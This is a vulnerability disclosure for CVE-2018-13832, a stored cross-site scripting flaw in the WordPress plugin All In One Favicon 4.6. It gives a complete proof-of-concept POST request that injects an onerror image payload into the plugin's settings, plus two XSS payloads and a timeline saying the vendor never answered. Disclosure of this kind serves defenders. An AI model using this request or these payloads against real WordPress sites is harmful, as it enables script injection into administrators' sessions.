WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting

# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo
 
# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
 
Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.
 
Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
 
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"

9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"

aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"

"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"

Guardar cambios
-----------------------------168911549614148

Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"

true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148--

Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I send the report. (no answer)
27/05/2018 I send the report, again. (no answer)
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/